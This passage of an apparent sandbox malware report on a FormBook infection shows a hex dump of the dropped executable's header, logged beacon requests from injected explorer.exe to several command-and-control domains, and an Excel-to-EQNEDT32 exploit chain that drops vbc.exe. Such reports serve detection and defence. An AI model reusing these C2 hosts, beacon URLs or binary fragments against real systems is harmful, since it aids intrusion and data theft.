                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 56 1b 91 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 1e 0a 00 00 08 00 00 00 00 00 00 26 3d 0a 00 00 20 00 00 00 40 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 3c 0a 00 4f 00 00 00 00 40 0a 00 14 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2c 1d 0a 00 00 20 00 00 00 1e 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 14 04 00 00 00 40 0a 00 00 06 00 00 00 20 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 3d 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 2c 6e 01 00 b8 6d 01 00 03 00 00 00 01 00 00 06 e4 db 02 00 f0 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1d 00 00 0a 28 1e 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 1f 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 20 00 00 0a 00 02 17 28 21 00 00 0a 00 02 17 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 93 03 00 06 28 25 00 00 0a 00 2a 26 00 02 28 26 00 00 0a 00 2a ce 73 27 00 00 0a 80 01 00 00 04 73 28 00 00 0a 80 02 00 00 04 73 29 00 00 0a 80 03 00 00 04 73 2a 00 00 0a 80 04 00 00 04 73 2b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 26 00 02 28 31 00 00 0a 00 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 32 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 33 00 00 0a 6f 34 00 00 0a 73 35 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b
                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELV`P&= @@ @<O@` H.text, `.rsrc@ @@.reloc`&@B=H,nm`0(((o*( (!("(#($*N(o(%*&(&*s's(s)s*s+*0~o,+*0~o-+*0~o.+*0~o/+*0~o0+*&(1*0<~(2,!rp(3o4s5~+*0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              1192.168.2.2249169198.54.117.21080C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              May 4, 2021 16:59:58.265768051 CEST702OUTGET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=E22nI3Rip3ZSCOTPZfimDOhq+q3UJ25lzohrmQ28oPNp9Jez+bbbIRv2vJSFHaNW2ScwBg== HTTP/1.1
                                                                                                                                                              Host: www.donelys.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              2192.168.2.2249170108.177.174.18280C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              May 4, 2021 17:00:04.009607077 CEST703OUTGET /8u3b/?hR-pi0=s5u5WNMtaTRlz52z/4dgKpDJSj+CyHwo8kTb9wzTosdJqxcIJBsW60lsAC1MLSgGQxuvcQ==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1
                                                                                                                                                              Host: www.discjockeydelraybeach.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              May 4, 2021 17:00:04.202766895 CEST703INHTTP/1.1 200 OK
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                                                                              X-Powered-By: Nginx
                                                                                                                                                              Date: Tue, 04 May 2021 15:00:01 GMT
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                                                                                                              Data Ascii: 3


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              3192.168.2.2249171103.5.116.13280C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              May 4, 2021 17:00:09.929189920 CEST708OUTGET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=PWNBDH2kPFbxu8wMq8B+54WayNfcYj50QVExyBnwJwJD4MXsJiLDRtZ2aZJG8kcSD/SQ2A== HTTP/1.1
                                                                                                                                                              Host: www.arfjkacsgatfzbazpdth.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              May 4, 2021 17:00:10.211775064 CEST709INHTTP/1.1 302 Found
                                                                                                                                                              Date: Tue, 04 May 2021 15:00:10 GMT
                                                                                                                                                              Server: Apache
                                                                                                                                                              Location: http://choco.mhnebsadebugpctkuryt.com/8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=PWNBDH2kPFbxu8wMq8B+54WayNfcYj50QVExyBnwJwJD4MXsJiLDRtZ2aZJG8kcSD/SQ2A==
                                                                                                                                                              Content-Length: 333
                                                                                                                                                              Connection: close
                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 68 6f 63 6f 2e 6d 68 6e 65 62 73 61 64 65 62 75 67 70 63 74 6b 75 72 79 74 2e 63 6f 6d 2f 38 75 33 62 2f 3f 41 46 4e 48 57 3d 37 6e 35 74 5f 4a 64 70 53 76 57 4c 79 32 30 26 61 6d 70 3b 68 52 2d 70 69 30 3d 50 57 4e 42 44 48 32 6b 50 46 62 78 75 38 77 4d 71 38 42 2b 35 34 57 61 79 4e 66 63 59 6a 35 30 51 56 45 78 79 42 6e 77 4a 77 4a 44 34 4d 58 73 4a 69 4c 44 52 74 5a 32 61 5a 4a 47 38 6b 63 53 44 2f 53 51 32 41 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://choco.mhnebsadebugpctkuryt.com/8u3b/?AFNHW=7n5t_JdpSvWLy20&amp;hR-pi0=PWNBDH2kPFbxu8wMq8B+54WayNfcYj50QVExyBnwJwJD4MXsJiLDRtZ2aZJG8kcSD/SQ2A==">here</a>.</p></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              4192.168.2.224917254.156.162.12180C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              May 4, 2021 17:00:15.537406921 CEST710OUTGET /8u3b/?hR-pi0=cEpfZmSfutugLfnHiVa5j+DoAWkRsp0AYbKMWCAK4J6qc2NYi7fbBnHBsJTiUxkMWvO3QA==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1
                                                                                                                                                              Host: www.girlboyfriends.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              May 4, 2021 17:00:15.678083897 CEST712INHTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 04 May 2021 15:00:15 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 31 34 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 64 38 64 38 64 38 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 6d 65 62 72 69 67 68 74 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 67 2e 70 6e 67 29 20 74 6f 70 20 72 65 70 65 61 74 2d 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 70 61 67 65 42 72 6f 77 73 65 72 45 72 72 6f 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 32 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 73 68 61 64 6f 77 5f 6c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6d 61 69 6e 5f 62 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 2e 68 65 61 64 65 72 53 68 6f 72 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 36 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 20 2e 68 65 61 64 65 72 5f 69 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 34 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 6d 65 62 72 69 67 68 74 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 65 61 64 65 72 5f 62 67 2e 70 6e 67 29 20 74 6f 70 20 72 65 70 65 61 74 2d 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 20 2e 68 65 61 64 65 72 5f 74 6f 70 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 36 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 0d 0a 20 20 20
                                                                                                                                                              Data Ascii: 14c8<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body { background: #d8d8d8 url(https://www.namebrightstatic.com/images/bg.png) top repeat-x; } .pageBrowserError { min-height: 600px; } .container { margin: 0 auto; width: 922px; } .shadow_l { margin-left: 10px; } .main_bg { background: #fff; } #header { padding: 0 2px; background: #fff; } #header.headerShort { height: 65px; } #header .header_in { padding-right: 14px; height: 145px; overflow: hidden; background: url(https://www.namebrightstatic.com/images/header_bg.png) top repeat-x; } #header .header_top { height: 65px; overflow: hidden


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              5192.168.2.224917366.235.200.14780C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              May 4, 2021 17:00:20.875209093 CEST717OUTGET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=4vEXK17NAw98WSwuRvIivdS0Cql5iuvV57S3vBg5ItlEon/vTWnd62XFea7/xPqTXNoABg== HTTP/1.1
                                                                                                                                                              Host: www.burundiacademyst.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              May 4, 2021 17:00:21.241594076 CEST718INHTTP/1.1 404 Not Found
                                                                                                                                                              Date: Tue, 04 May 2021 15:00:21 GMT
                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: __cfduid=d94f65b7ed78b4bb4ec06c920816dea0c1620140420; expires=Thu, 03-Jun-21 15:00:20 GMT; path=/; domain=.www.burundiacademyst.com; HttpOnly; SameSite=Lax
                                                                                                                                                              CF-Cache-Status: MISS
                                                                                                                                                              cf-request-id: 09d97e072e00004e44b212b000000001
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 64a2991eb90d4e44-FRA
                                                                                                                                                              Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                              Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              6192.168.2.2249174157.7.107.16580C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              May 4, 2021 17:00:27.158471107 CEST718OUTGET /8u3b/?hR-pi0=is2RHo+SSSgsSZ79kFP2fipAdyQPfT8mS9EUUiQml/0cQ9Z+p8X+D6w9d6gDGaMqZNMd+w==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1
                                                                                                                                                              Host: www.pipienta.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              May 4, 2021 17:00:29.320266962 CEST719INHTTP/1.1 301 Moved Permanently
                                                                                                                                                              Date: Tue, 04 May 2021 15:00:29 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: close
                                                                                                                                                              Server: Apache
                                                                                                                                                              X-Powered-By: PHP/7.4.12
                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                              X-Redirect-By: WordPress
                                                                                                                                                              Location: https://www.pipienta.com/8u3b/?hR-pi0=is2RHo+SSSgsSZ79kFP2fipAdyQPfT8mS9EUUiQml/0cQ9Z+p8X+D6w9d6gDGaMqZNMd+w==&AFNHW=7n5t_JdpSvWLy20
                                                                                                                                                              X-Cache: MISS


                                                                                                                                                              Code Manipulations

                                                                                                                                                              Statistics

                                                                                                                                                              Behavior

                                                                                                                                                              Click to jump to process

                                                                                                                                                              System Behavior

                                                                                                                                                              Analysis Process: EXCEL.EXE PID: 2396 Parent PID: 584

                                                                                                                                                              General

                                                                                                                                                              Start time:16:58:47
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                              Imagebase:0x13fde0000
                                                                                                                                                              File size:27641504 bytes
                                                                                                                                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              Analysis Process: EQNEDT32.EXE PID: 2584 Parent PID: 584

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:08
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:543304 bytes
                                                                                                                                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              Analysis Process: vbc.exe PID: 2872 Parent PID: 2584

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:11
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                              Imagebase:0xa60000
                                                                                                                                                              File size:665600 bytes
                                                                                                                                                              MD5 hash:5551346AA9F251895021B95A2A7CC390
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                              • Detection: 13%, ReversingLabs
                                                                                                                                                              Reputation:low

                                                                                                                                                              Analysis Process: vbc.exe PID: 2976 Parent PID: 2872

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:14
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                              Imagebase:0xa60000
                                                                                                                                                              File size:665600 bytes
                                                                                                                                                              MD5 hash:5551346AA9F251895021B95A2A7CC390
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low

                                                                                                                                                              Analysis Process: vbc.exe PID: 2460 Parent PID: 2872

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:15
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                              Imagebase:0xa60000
                                                                                                                                                              File size:665600 bytes
                                                                                                                                                              MD5 hash:5551346AA9F251895021B95A2A7CC390
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low

                                                                                                                                                              Analysis Process: vbc.exe PID: 2276 Parent PID: 2872

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:16
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                              Imagebase:0xa60000
                                                                                                                                                              File size:665600 bytes
                                                                                                                                                              MD5 hash:5551346AA9F251895021B95A2A7CC390
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              Reputation:low

                                                                                                                                                              Analysis Process: explorer.exe PID: 1388 Parent PID: 2276

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:21
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:
                                                                                                                                                              Imagebase:0xffca0000
                                                                                                                                                              File size:3229696 bytes
                                                                                                                                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              Analysis Process: NAPSTAT.EXE PID: 1960 Parent PID: 2276

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:46
                                                                                                                                                              Start date:04/05/2021
